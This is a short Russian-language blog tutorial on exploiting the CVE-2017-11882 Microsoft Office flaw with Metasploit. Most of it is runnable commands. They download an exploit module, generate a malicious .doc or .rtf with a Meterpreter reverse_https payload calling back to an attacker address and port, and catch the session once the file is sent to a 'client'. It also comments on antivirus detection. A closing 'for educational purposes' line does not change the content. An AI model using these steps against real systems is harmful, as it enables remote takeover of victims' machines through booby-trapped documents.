CVE-2017-11882 MS Word Metasploit
Life-HackДобрый день мы уже писали о этом.
Мы рассмотрим альтернативный вариант через Metasploit:
Скачаем и перенесём експлоит
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb cp office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
Запускаем metasploit и выбираем наш модуль.
service postgresql start msfconsole use exploit/windows/fileformat/office_ms17_11882
Просмотрим информацию о модуле
info
Из описания узнаём, что уязвимость существовала на протяжении 17 ЛЕТ! Шикарно, да? Представляете сколько ещё подобного рода CVE неизучено и неизвестно общественности?
Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой
set FILENAME /root/exp.doc
Можно поставить и *.rtf, отработает и так и так.
Добавляем пейлоад и запускаем
set payload windows/meterpreter/reverse_https set lhost 192.168.0.100 (адрес атакующего) set lport 4443 (как обычно, можете выбирать почти любой) exploit
Собственно, всё.
Берём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы).
Запускаем, ловим сессию.
AV так же не стоит на месте
На палевность можете даже и не смотреть ибо через месяц тут будет поголовно всё красное =)
Информация дана для ознакомления, спасибо за внимание)
Альтернативный вариант пост эксплуатации через Empire Powershell